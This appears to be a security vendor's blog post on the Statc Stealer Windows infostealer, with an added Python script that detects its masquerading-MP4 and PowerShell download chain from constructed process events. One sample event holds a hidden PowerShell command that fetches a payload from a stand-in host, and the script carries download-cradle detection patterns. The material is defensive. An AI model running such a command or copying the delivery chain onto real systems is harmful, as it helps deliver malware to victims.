A newly discovered malware strain named "Statc Stealer" has been making the rounds, wreaking havoc on devices running Microsoft Windows by stealing valuable personal and financial data. Security researchers Shivam Sharma and Amandeep Kumar of Zscaler ThreatLabz, who published a comprehensive technical report this week, classify the stealer as a potent threat because of the breadth of data it can steal.
Statc Stealer can steal sensitive information from a broad range of web browsers, including not only login credentials but also cookies, user preferences, and general browsing data. The threat extends to cryptocurrency wallets and messaging applications such as Telegram, from which Statc can steal credentials, passwords, and any other valuable data. Of particular concern is that the stealer is written in C++, which makes it complex and challenging to counter.
The attacker typically tricks potential victims into clicking on seemingly harmless advertisements, with the stealer masquerading as an MP4 video file in web browsers such as Google Chrome. When the first-stage payload runs, it launches a decoy PDF installer while surreptitiously installing a downloader binary, which in turn retrieves the stealer malware from a remote server using a PowerShell script.
Thanks to its built-in checks, the malware can hinder sandbox analysis and reverse engineering attempts. It communicates with a command-and-control (C&C) server, to which it exfiltrates the victim's harvested data over HTTPS. It also inspects file names for irregularities and halts its own execution if it finds discrepancies, so as to avoid detection.
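The delivery chain and evasion behaviour described above can be turned into telemetry checks. The following Python script is an added example written for this post; it is not code from Zscaler ThreatLabz or from the Statc Stealer report. It runs over a handful of constructed Sysmon-style process-creation events (hypothetical paths, PIDs and a `.invalid` download host) and flags two things: an executable whose name carries a media extension in front of its real `.exe` extension, and a PowerShell download command launched by a binary staged in a user-writable directory. For each hit it reports the full parent chain, which is what an analyst needs to see the browser-to-downloader-to-PowerShell sequence in one line. The regex patterns, rule names and sample events are assumptions, not indicators taken from the report.

```python
"""Toy process-lineage detector for a Statc-style delivery chain (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


# PowerShell download cradles commonly seen in delivery scripts (assumed patterns).
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadfile|downloadstring|net\.webclient|start-bitstransfer)",
    re.IGNORECASE,
)
# Media/document extension followed by an executable extension, e.g. clip.mp4.exe (assumed masquerade pattern).
DOUBLE_EXT = re.compile(r"\.(mp4|avi|mkv|pdf|docx?)\.(exe|scr|com|bat|cmd)$", re.IGNORECASE)
# Directories a normal user can write to; a downloader staged here is more suspicious than one under Program Files.
USER_WRITABLE = re.compile(r"\\(downloads|appdata\\local\\temp|temp)\\", re.IGNORECASE)

# Constructed sample events, not real telemetry. PIDs, paths and the host are hypothetical.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    ProcEvent(200, 100, r"C:\Users\alice\Downloads\holiday_video.mp4.exe", "holiday_video.mp4.exe"),
    ProcEvent(300, 200, r"C:\Users\alice\AppData\Local\Temp\setup_pdf.exe", "setup_pdf.exe"),
    ProcEvent(400, 200, r"C:\Users\alice\AppData\Local\Temp\dl.exe", "dl.exe"),
    ProcEvent(500, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "Invoke-WebRequest http://downloader.example.invalid/payload '
              '-OutFile $env:TEMP\\s.exe"'),
    # Benign admin activity: PowerShell started from Explorer running a local script.
    ProcEvent(600, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(700, 600, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -File C:\\scripts\\backup.ps1"),
]


def basename(path: str) -> str:
    """Return the file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1]


def lineage(events: Dict[int, ProcEvent], pid: int) -> List[str]:
    """Walk ppid links back to the root and return image basenames, root first.

    A `seen` set guards against PID reuse producing a cycle in the table.
    """
    chain: List[str] = []
    seen = set()
    cur = events.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = events.get(cur.ppid)
    chain.reverse()
    return chain


def find_suspicious(event_list: List[ProcEvent]) -> List[dict]:
    """Apply both rules to every event and return one finding per match, with its parent chain."""
    by_pid = {e.pid: e for e in event_list}
    findings: List[dict] = []
    for e in event_list:
        name = basename(e.image)
        # Rule 1: a "video" or "document" that is actually an executable.
        if DOUBLE_EXT.search(name):
            findings.append({"rule": "media-name-executable", "pid": e.pid,
                             "chain": lineage(by_pid, e.pid)})
        # Rule 2: PowerShell fetching something from the network, launched by a
        # binary that lives in a user-writable staging directory.
        if name.lower() == "powershell.exe" and DOWNLOAD_CRADLE.search(e.cmdline):
            parent = by_pid.get(e.ppid)
            if parent is not None and USER_WRITABLE.search(parent.image):
                findings.append({"rule": "powershell-download-from-staged-binary", "pid": e.pid,
                                 "chain": lineage(by_pid, e.pid)})
    return findings


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"{hit['rule']}: pid {hit['pid']} via {' -> '.join(hit['chain'])}")
```

Against the constructed events the script reports two hits, both rooted at the browser process, and stays silent on the Explorer-launched backup script because that command line has no download cradle. In a real deployment the two rules would sit on top of an EDR or Sysmon event feed rather than an in-memory list, and the extension and directory patterns would be tuned to the environment.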
The stealer mainly targets web browsers, including Google Chrome, Microsoft Edge, Mozilla Firefox, Brave, Opera, and Yandex Browser. "The potency of the Statc Stealer lies within its ability to securely extract valuable browser data and transmit it to its C&C server," the researchers explained. This gives the malware a wealth of critical data such as passwords and personal information, paving the way for crimes such as identity theft and financial fraud.
These findings came shortly after eSentire published an analysis of an upgraded version of Raccoon Stealer, version 2.1, which was released in early February. Last year's arrest of lead developer Mark Sokolovsky led to a temporary halt in the malware's development. Sokolovsky mistakenly linked a Gmail account he used for cybercrime under the alias Photix to an Apple iCloud account, thereby disclosing his real identity. The updated stealer includes features such as data collection from Signal Messenger, a technique to evade Defender detection, and automatic brute-forcing of crypto wallets.
As such cyber threats grow more prevalent and more complex, staying up to date with the latest cybersecurity news, insights, and preventive measures matters more than ever.
At Darksteel Technologies, we are an Orlando-based business that can handle all aspects of your IT security, providing compliance, training, malware protection, cloud security, DevSecOps, vulnerability management, penetration testing, architecture design, and any other information security requirement your business has. We focus on your cybersecurity so you don't have to.